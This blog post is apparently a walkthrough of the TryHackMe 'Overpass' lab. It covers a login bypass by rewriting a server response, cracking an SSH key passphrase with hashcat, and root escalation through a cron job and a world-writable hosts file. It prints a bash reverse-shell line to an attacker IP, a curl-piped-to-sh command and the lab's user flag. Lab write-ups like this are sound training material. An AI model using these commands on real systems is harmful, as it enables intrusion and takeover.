---
layout: post
title: TryHackMe - Overpass
date: '2023-12-23 10:29:32 +0800'
categories: [CTF, TryHackMe]
tags: [ctf,tryhackme]
math: true
libraries:
  - mathjax
description: Overpass Room in TryHackMe
---

# Description

What happens when a group of broke Computer Science students try to make a password manager? Obviously a perfect commercial success!

# Enumeration

### Nmap Scan

```bash
nmap -p- -T5 $IP
```

```text
Nmap scan report for 10.10.88.227
Host is up (0.19s latency).
Not shown: 64807 closed tcp ports (conn-refused), 726 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```

### Dirbuster Scan

{{< img src="/images/Overpass/Dirbuster.png" title="Dirbuster Scan" caption="Administrator Page found!" alt="" width="700px" position="center" >}}

Looks like there is a route to `http://10.10.88.227/admin.html`. Inspecting the sources (`login.js`), we can see the vulnerable code block:

{{< img src="/images/Overpass/Vulnerable_code.png" title="Vulnerable Code Block" caption="Look at the `else` block" alt="" width="700px" position="center" >}}

The `if-else` block only checks whether the POST response says "Incorrect Credentials"; any other response falls into the `else` branch and is treated as a successful login. We could therefore modify the response in Burp Suite to force the creation of a `SessionToken` cookie (or simply create one ourselves).
# Burpsuite Intercept

{{< img src="/images/Overpass/Burpsuite_Req.png" title="Burpsuite" caption="Modify Burpsuite Response" alt="" width="700px" position="center" >}}

Intercepting the traffic, we can choose `Response to this request` in the UI:

{{< img src="/images/Overpass/Burpsuite_mod_response.png" title="Burpsuite" caption="Response to this request" alt="" width="700px" position="center" >}}

Forwarding the traffic, we can see the modified response:

{{< img src="/images/Overpass/Burpsuite_mod_response_recv.png" title="Burpsuite" caption="Modified Request" alt="" width="700px" position="center" >}}

We can then refresh the page in Burp Suite's browser and find that we are logged in!

{{< img src="/images/Overpass/Overpass_Login_landing.png" title="Overpass" caption="Successful Login!" alt="" width="700px" position="center" >}}

We can see that a `SessionToken` cookie has been created in the browser:

{{< img src="/images/Overpass/Mod_session_cookie.png" title="Burpsuite" caption="Modified Session Key" alt="" width="700px" position="center" >}}

Looks like an SSH RSA private key. We might be able to use this to access the server.

# SSH

Trying this:

```bash
ssh -i james.key james@$IP
```

I get the following response:

{{< img src="/images/Overpass/failed_ssh.png" title="SSH" caption="SSH Requires a passphrase" alt="" width="700px" position="center" >}}

## Cracking the SSH key passphrase

I first used `ssh2john` to convert the key into a hash:

```bash
ssh2john james.key > james.key.hash
```

After removing the `rsa.key:` prefix from the hash, I used hashcat to identify the mode id of the hash to crack:

{{< img src="/images/Overpass/key_to_hash.png" title="SSH" caption="Hash Generation and Identification" alt="" width="700px" position="center" >}}

I then used `hashcat` to crack the hash with the `rockyou` wordlist:

```bash
hashcat -m 22931 james.key.hash /usr/share/wordlists/rockyou.txt
```

{{< img src="/images/Overpass/cracked_key.png" title="SSH" caption="Cracked Key!" alt="" width="700px" position="center" >}}

Passphrase: `james13`

## Login attempt

Using the same command, I tried to SSH into the machine with the key and passphrase:

{{< img src="/images/Overpass/successful_ssh.png" title="SSH" caption="Successful Login with the passphrase!" alt="" width="700px" position="center" >}}

We got the user flag:

```text
thm{65c1aaf000506e56996822c6281e6bf7}
```

# Privilege Escalation

Using linPEAS, we can find possible routes to privilege escalation. Following [this tutorial](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS#quick-start), I started a web server on the attacking machine and curl-ed the script on the victim machine:

```bash
# HOST_IP is the attacking machine serving linpeas.sh
curl $HOST_IP/linpeas.sh | sh
```

### Crontab

{{< img src="/images/Overpass/linpeas_crontab.png" title="Linpeas" caption="Crontab" alt="" width="700px" position="center" >}}

The final line in the crontab runs as `root`: it fetches a bash script from a particular server and executes it.

### Hosts File

{{< img src="/images/Overpass/linpeas_host_file.png" title="Linpeas" caption="Host File" alt="" width="700px" position="center" >}}

The hosts file is writable by everyone. That means I could point `overpass.thm` in the hosts file at the attacking machine, so that the cron job fetches and runs a script served from there.

## Escalation Process

We first created the necessary directories and the `buildscript.sh` file:

```bash
mkdir downloads
mkdir downloads/src
vim downloads/src/buildscript.sh
# Create the file with this as content:
# bash -i >& /dev/tcp/HOST-IP/5555 0>&1
# bash -i >& /dev/tcp/10.17.101.177/5555 0>&1

# Just in case (probably not needed, since the script is piped into a shell)
chmod +x downloads/src/buildscript.sh
```

and also started two listeners on the attacking machine:

```bash
# Start the netcat listener (TCP: the /dev/tcp reverse shell needs a TCP listener, so no -u)
nc -lvnp 5555

# Python 3 HTTP server
# sudo python3 -m http.server 80

# Python 2 HTTP server
python2 -m SimpleHTTPServer 80
```

It doesn't seem like the Python 3 server works, so I used Python 2 with `SimpleHTTPServer` instead.
(More info later.) The script used was a bash reverse shell; following the tutorial [here](https://ioflood.com/blog/bash-reverse-shell/), I created the file with this as the content:

```bash
#!/bin/bash
bash -i >& /dev/tcp/10.17.101.177/5555 0>&1
```

On the victim machine, I modified the hosts file:

```text
10.17.101.177 overpass.thm
```

{{< img src="/images/Overpass/modified_hosts.png" title="Hosts File" caption="Modified Hosts file in victim machine" alt="" width="700px" position="center" >}}

And then we wait. The script will be executed once the cron job makes its request.

{{< img src="/images/Overpass/python_web_server.png" title="Python Web Server" caption="Python3 doesn't seem to work" alt="" width="700px" position="center" >}}

After a few seconds, we get a reverse shell running as root! We can get the root flag from the current directory:

{{< img src="/images/Overpass/root_flag.png" title="Root" caption="Root Flag!" alt="" width="700px" position="center" >}}

We can see that we are root, and `root.txt` is in the current directory, so we can read the root flag.